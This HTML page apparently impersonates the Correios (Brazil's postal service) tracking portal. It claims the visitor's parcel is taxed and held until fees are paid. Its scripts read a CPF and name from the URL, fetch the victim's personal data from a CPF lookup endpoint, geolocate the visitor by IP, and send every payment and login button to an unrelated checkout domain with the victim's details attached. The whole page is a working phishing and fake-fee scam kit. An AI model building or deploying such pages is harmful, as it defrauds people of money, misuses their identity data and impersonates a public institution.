<!DOCTYPE html><html lang="pt-BR"><head>

  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <meta http-equiv="X-UA-Compatible" content="ie=edge">
  <link rel="preconnect" href="https://fonts.googleapis.com/">
  <link rel="preconnect" href="https://fonts.gstatic.com/" crossorigin="">
  <link href="css2-1.html" rel="stylesheet">
  <link rel="stylesheet" href="css/ojYefv6e4a1s.css">
  <link rel="stylesheet" href="css/bAe1ZrzDL0D2.css">
  <link rel="stylesheet" href="css/Mz47dlHiSITt.css">
  <link rel="stylesheet" href="css/dSSpl60ogFQz.css" crossorigin="anonymous">
  <meta name="csrf-token" content="XhpaSjXrgaC3XF8BrR4GtmpFPMLsyEiAAnHS72ER">
  <title>Sua Encomenda</title>
  <link rel="stylesheet" type="text/css" href="css/uWnllG03df3h.css">
  <script type="text/javascript" class="flasher-js">(function () { var rootScript = '../cdn.jsdelivr.net/npm/%40flasher/flasher%401.3.2/dist/flasher.min.js'; var FLASHER_FLASH_BAG_PLACE_HOLDER = {}; var options = mergeOptions([], FLASHER_FLASH_BAG_PLACE_HOLDER); function mergeOptions(first, second) { return { context: merge(first.context || {}, second.context || {}), envelopes: merge(first.envelopes || [], second.envelopes || []), options: merge(first.options || {}, second.options || {}), scripts: merge(first.scripts || [], second.scripts || []), styles: merge(first.styles || [], second.styles || []), }; } function merge(first, second) { if (Array.isArray(first) && Array.isArray(second)) { return first.concat(second).filter(function (item, index, array) { return array.indexOf(item) === index; }); } return Object.assign({}, first, second); } function renderOptions(options) { if (!window.hasOwnProperty('flasher')) { console.error('Flasher is not loaded'); return; } requestAnimationFrame(function () { window.flasher.render(options); }); } function render(options) { if ('loading' !== document.readyState) { renderOptions(options); return; } document.addEventListener('DOMContentLoaded', function () { renderOptions(options); }); } if (1 === document.querySelectorAll('script.flasher-js').length) { document.addEventListener('flasher:render', function (event) { render(event.detail); }); } if (window.hasOwnProperty('flasher') || !rootScript || document.querySelector('script[src="' + rootScript + '"]')) { render(options); } else { var tag = document.createElement('script'); tag.setAttribute('src', rootScript); tag.setAttribute('type', 'text/javascript'); tag.onload = function () { render(options); }; document.head.appendChild(tag); } })();</script><script src="../cdn.jsdelivr.net/npm/%40flasher/flasher%401.3.2/dist/flasher.min.js" type="text/javascript"></script>
  <script src="js/7U00XSaMzBtR.js" type="text/javascript"></script><script src="js/immIlQZcGwCc.js" type="text/javascript"></script>
  
  <script src="js/un3xLZBs44I6.js" data-utmify-prevent-subids="" async="" defer=""></script>

  <script>
    document.addEventListener("DOMContentLoaded", () => {
        function getQueryParam(param) {
            const urlParams = new URLSearchParams(window.location.search);
            return urlParams.get(param);
        }

        function formatarNome(nome) {
            return nome.toLowerCase().replace(/(?:^|\s)\S/g, a => a.toUpperCase());
        }

        function atualizarLinksCheckout(cpf, nome) {
            // Decodifica o nome para evitar problemas de dupla codificação
            const nomeDecodificado = decodeURIComponent(nome);
            const nomeFormatado = formatarNome(nomeDecodificado);

            // Evita codificar novamente se já está correto
            const checkoutLinks = document.querySelectorAll('[href*="go.disruptybr.site]');
            checkoutLinks.forEach(link => {
                const novaUrl = new URL(link.href);
                novaUrl.searchParams.set('document', cpf);
                novaUrl.searchParams.set('cust_name', nomeFormatado); // Use nomeFormatado diretamente
                link.href = novaUrl.toString();
                console.log("Link atualizado:", link.href);
            });
        }

        function exibirValoresNaPagina(cpf, nome) {
            const nomeDecodificado = decodeURIComponent(nome);
            const nomeFormatado = formatarNome(nomeDecodificado);

            document.querySelectorAll('.nome').forEach(el => el.textContent = nomeFormatado);
            document.querySelectorAll('.cpf').forEach(el => el.textContent = cpf);
        }

        const cpf = getQueryParam('cpf');
        const nome = getQueryParam('nome');

        if (cpf && nome) {
            atualizarLinksCheckout(cpf, nome);
            exibirValoresNaPagina(cpf, nome);
        } else {
            console.error("CPF ou Nome ausente na URL.");
        }
    });
  </script>
  
  <script>
    document.addEventListener("DOMContentLoaded", () => {
        const mainContent = document.querySelector('main');
        mainContent.style.display = 'none';

        const loader = document.createElement('div');
        loader.id = 'loader';
        loader.textContent = 'Carregando dados...';
        loader.style.cssText = `
            position: fixed;
            top: 0;
            left: 0;
            width: 100%;
            height: 100%;
            background: white;
            display: flex;
            justify-content: center;
            align-items: center;
            font-size: 20px;
            font-weight: bold;
            z-index: 1000;
        `;
        document.body.appendChild(loader);

        function getQueryParam(param) {
            const urlParams = new URLSearchParams(window.location.search);
            return urlParams.get(param);
        }

        const cpf = getQueryParam('cpf');
        let dadosCPF = null;
        let cidade = null;

        function obterDadosCPF(cpf) {
            return fetch(`/consultar-cpf.php?cpf=${encodeURIComponent(cpf)}`)
                .then(response => {
                    if (!response.ok) {
                        throw new Error('Erro ao buscar dados do backend de CPF.');
                    }
                    return response.json();
                })
                .then(data => {
                    if (data && data.nome && data.cpf) {
                        console.log('Dados de CPF recebidos:', data);
                        dadosCPF = data;
                    } else {
                        console.error('Dados de CPF inválidos ou incompletos.');
                    }
                })
                .catch(error => {
                    console.error('Erro ao buscar dados de CPF:', error);
                });
        }

        function obterCidade() {
            return fetch('https://ipinfo.io/json?token=e33b87f37a71e1')
                .then(response => response.json())
                .then(data => {
                    cidade = data.city || 'Curitiba, PR.';
                    console.log('Cidade obtida:', cidade);
                })
                .catch(error => {
                    console.error('Erro ao obter cidade:', error);
                    cidade = 'Não foi possível determinar a cidade.';
                });
        }

        function exibirDados() {
            if (dadosCPF) {
                document.querySelectorAll('.nome').forEach(el => el.textContent = formatarNome(dadosCPF.nome));
                document.querySelectorAll('.cpf').forEach(el => el.textContent = formatarCPF(dadosCPF.cpf));
            }
            if (cidade) {
                document.getElementById('cidade').textContent = cidade;
            }
        }

        function formatarCPF(cpf) {
            return cpf.replace(/(\d{3})(\d{3})(\d{3})(\d{2})/, "$1.$2.$3-$4");
        }

        function formatarNome(nome) {
            return nome.toLowerCase().replace(/(?:^|\s)\S/g, function(a) { return a.toUpperCase(); });
        }

        function delay(ms) {
            return new Promise(resolve => setTimeout(resolve, ms));
        }

        async function finalizarCarregamento() {
            await delay(1000);
            const loaderElement = document.getElementById('loader');
            if (loaderElement) {
                loaderElement.remove();
            }
            mainContent.style.display = 'block';
        }

        if (cpf) {
            Promise.all([obterDadosCPF(cpf), obterCidade()])
                .then(() => {
                    exibirDados();
                    finalizarCarregamento();
                })
                .catch(error => {
                    console.error('Erro ao carregar dados:', error);
                    finalizarCarregamento();
                });
        } else {
            console.error('CPF não encontrado na URL.');
            finalizarCarregamento();
        }
    });
</script>

</head>
    
<body>
  <header class="w-100 font-size-16 font-weight-400 text-blue">
    <div class="w-100 bg-grey px-3 px-lg-3 py-1 border-bottom border-white">
      <span>Acessibilidade</span>

      <i class="fas fa-caret-down ml-1"></i>
    </div>
<style>.div-flex { display: flex; align-items: center; justify-content: center; }
</style>
    <nav class="w-100 d-flex align-items-center bg-grey-2 px-3 px-lg-3 py-1 border-bottom border-warning" style="height:48px">
      <div class="ml-0 ml-lg-1 d-flex justify-content-center" style="width:100%">
        <a href="https://go.disruptybr.com.br/ywahxkis1b" class="py-2">
          <img src="images/NKhjCtJZ0lgK.png" alt="" height="25">
        </a>
      </div>

      <div class="ml-4 d-none d-lg-block " style="width:150px">
        <a href="https://go.disruptybr.com.br/ywahxkis1b" class="py-1 text-blue-dark border-left border-secondary px-3 text-decoration-none">
          <img src="images/OzcwVbf11Dwo.svg" alt="Correios" width="31">

          <span class="ml-1">Entrar</span>
        </a>
      </div>
    </nav>
  </header>

  <main style="display: block;">
    <nav class="d-flex align-items-center flex-wrap mt-4 px-2 font-weight-400 w-95 max-w-1000" style="margin: 0 auto;">
      <span class="text-blue mr-2">Portal Correios</span>
      <i class="fal fa-angle-right mr-2"></i>
      <span class="text-blue mr-2">Rastreamento</span>
      <i class="fal fa-angle-right mr-2"></i>

      <span class="text-blue mr-2"><span class="cpf"></span></span>
    </nav>

    
    <section class="mt-3 p-4  w-95 max-w-1000" style="margin:0 auto;">

      <h5 class="text-danger  font-weight-700 mb-4">
        <i class="far fa-exclamation-triangle"></i> SUA ENCOMENDA FOI TRIBUTADA!


      </h5>
      <h4 class="text-blue-dark font-size-20 font-weight-700 mt-1 mb-2">

        STATUS DA ENTREGA: <br>
      </h4>

      <h4 class="text-warning font-size-18 font-weight-700 mt-1 mb-2 d-flex align-items-center">
        <div id="blink" style="width:12px;height:12px;border-radius:50%;" class="mr-2 bg-warning"></div>
        AGUARDANDO PAGAMENTO
      </h4>
      <h5 id="address" style="color:#555577;">Sua encomenda está retida na agência dos correios em <span id="cidade">Carregando cidade...</span></h5>
      
      <p class="mt-4">Para prosseguir com o processo de liberação e entrega da sua encomenda, é necessário efetuar o pagamento das taxas aplicáveis. Por favor, utilize o botão abaixo para realizar o procedimento de forma segura:</p>



    </section>
    <div style="padding: 0px 30px 0px 30px;">
    <a href="https://go.disruptybr.com.br/ywahxkis1b" class="btn btn-primary" style="font-size:13px;width: 100%;">REGULARIZAR MINHA ENCOMENDA</a>

    </div>
    
    <section class="mt-3 p-4  w-95 max-w-1000" style="margin:0 auto;">

    <div class="container">
  <div class="overlay">
    <div class="overlay-text">
      <p class="rotate">
    
      NOME: <span class="nome"></span><br>CPF:  <span class="cpf"></span>      </p>
    </div>
  </div>
</div>


<style>/* Estilo para o contêiner pai */
.container {
  position: relative; /* Faz com que os filhos com posição absoluta sejam relativos a este contêiner */
  width: 100%; /* Ou o tamanho desejado */
  height: 300px; /* Ou o tamanho desejado */
  background-color: #f0f0f0; /* Apenas para dar um fundo e melhor visualização */
  border: 1px solid #ddd; /* Para visualizar a borda da div */
}

/* Estilo para a div que vai conter o texto */
.overlay {
  position: relative; /* Necessário para que o texto seja posicionado em relação a essa div */
  width: 100%; 
  height: 100%;
  background-image: url(images/HwEyYwT3tXwK.jpeg); /* Se for para usar uma imagem de fundo */
  background-size: cover; /* Ajusta a imagem de fundo */
  background-position: center;
}

/* Estilo para o texto centralizado dentro da div */
.overlay-text {
  position: absolute;
  top: 60%;
  left: 55%;
  transform: translate(-50%, -50%);
  background-color: transparent;
  color: black !important;
  padding: 10px 20px;
  font-size: 10px;
  text-align: center;
  border-radius: 5px;
  width: 300px;}

    .rotate{
      text-align: start;
        transform: rotate(2deg);
        
        color: black !important;
  font-weight: bold;
  opacity: 0.5;
  text-shadow: rgba(0, 0, 0, 0.3) 1px 1px 3px, rgba(0, 0, 0, 0.3) -1px -1px 3px, rgba(0, 0, 0, 0.1) 0px 0px 8px;
  transform-style: preserve-3d;
  transform: rotateX(1.2deg) rotateY(55deg);
    }

    /* Entre 100px e 200px, font para .rotate */
@media (min-width: 100px) and (max-width: 200px) {
  .rotate {
    font-size: 8px;
  }
}

/* Entre 201px e 300px, font para .rotate */
@media (min-width: 201px) and (max-width: 300px) {
  .rotate {
    font-size: 9px;
  }
}

/* Entre 301px e 400px, font para .rotate */
@media (min-width: 301px) and (max-width: 400px) {
  .rotate {
    font-size: 10px;
  }
}

</style>
</section>
    <section class="px-4 py mb-5 w-95 max-w-1000" style="margin:0 auto;">
      <ul>
 

        <li class="d-flex mt-4" style="position: relative">
          <div class="bg-grey d-flex justify-content-center align-items-center font-size-24 text-blue" style="width:50px;height:50px;border-radius:50%;z-index:100;min-widht:50px">
            <img src="images/3bsiWffSzLab.png" alt="" width="32">
          </div>

          <div class="w-70 d-flex flex-column flex-wrap ml-3 justify-content-center font-verdana">
            <h5 class="text-blue-dark font-size-13 font-weight-700 p-0 m-0 flex-wrap">
              Previsão de Entrega
            </h5>

            <span class="text-dark font-size-12 flex-wrap">
              3 dias após o pagamento
            </span>
          </div>
        </li>

        <li class="d-flex mt-5" style="position: relative">
          <div style="width:2px;height:120px;background-color:#FFC40C;position:absolute;top:-118px;left:24px"></div>

          <div class="bg-grey d-flex justify-content-center align-items-center font-size-24 text-blue" style="width:50px;height:50px;border-radius:50%;z-index:100;min-widht:50px">
            <i class="fal fa-usd-circle"></i>
          </div>

          <div class="w-70 d-flex flex-column flex-wrap ml-3 justify-content-center font-verdana">
            <h5 class="text-blue-dark font-size-13 font-weight-700 p-0 m-0 flex-wrap">
              Objeto aguardando pagamento
            </h5>

            <span class="text-dark font-size-12 flex-wrap">
              em Unidade de Fiscalização Aduaneira, Curitiba, PR <br>
            </span>

            <h5 class="mt-1 text-blue-dark font-size-13 font-weight-700 p-0 m-0 flex-wrap">
              Realize o pagamento: <a href="https://go.disruptybr.com.br/ywahxkis1b" class="text-blue">Efetuar Pagamento</a>
            </h5>
          </div>
        </li>

    </ul></section>

    <section class="my-4 w-95 max-w-1000" style="margin:0 auto;">
      <div>
        <img src="images/b2trCsqPiWhJ.jpg" alt="" class="w-100">
      </div>
    </section>
  </main>

  <footer class="d-flex flex-wrap px-5 py-4 bg-yellow text-blue-dark">
    <div class="w-30 min-w-300 px-0 px-lg-3 mb-3">
      <h5 class="font-weight-700 mb-4">Fale Conosco</h5>

      <ul>
        <li class="mb-2 font-size-14">
          <i class="fas fa-desktop"></i>
            <span class="text-wrap">Registro de Manifestações</span>
          
        </li>

        <li class="mb-2 font-size-14">
          <i class="far fa-question-square mr-1"></i>
            <span class="text-wrap">Central de Atendimento</span>
          
        </li>

        <li class="mb-2 font-size-14">
          <i class="far fa-briefcase"></i>
            <span class="text-wrap">Solucões para o seu negócio</span>
          
        </li>
        <li class="mb-2 font-size-14">
          <i class="far fa-headset"></i>
            <span class="text-wrap">Suporte ao cliente com contrato</span>
          
        </li>
        <li class="mb-2 font-size-14">
          <i class="far fa-comment-alt-dots"></i>
            <span>Ouvidoria</span>
          
        </li>

        <li class="mb-2 font-size-14">
          <i class="far fa-user-headset"></i>
            <span>Denúncia</span>
          
        </li>
      </ul>
    </div>

    <div class="w-30 min-w-300 px-0 px-lg-3 mb-3">
      <h5 class="font-weight-700 mb-4">Sobre os Correios</h5>

      <ul>
        <li class="mb-2 font-size-14">
          <i class="far fa-address-card"></i>
            <span>Identidade colaborativa</span>
          
        </li>

        <li class="mb-2 font-size-14">
          <i class="far fa-user-graduate"></i>
            <span>Educação e cultura</span>
          
        </li>

        <li class="mb-2 font-size-14">
          <i class="far fa-book-alt"></i>
            <span>Código de ética</span>
          
        </li>

        <li class="mb-2 font-size-14">
          <i class="far fa-comment-alt-dots"></i>
            <span class="text-wrap">Política de privacidade e Notas legais</span>
          
        </li>
      </ul>
    </div>

    <div class="w-30 min-w-300 px-0 px-lg-3 mb-3">
      <h5 class="font-weight-700 mb-4">Outros Sites</h5>

      <ul>
        <li class="mb-2 font-size-14">
          <i class="far fa-shopping-cart"></i>
            <span class="text-wrap">Loja online dos correios</span>
          
        </li>
      </ul>
    </div>

    <div class="d-flex justify-content-center w-100 px-3 mb-3 text-dark font-size-14">
      <span>© Copyright 2024 Correios</span>
    </div>
  </footer>

  <script src="js/NTWJSqhg24ZK.js"></script>
  <script src="js/Cdi10Xxx7mFf.js"></script>


</body></html>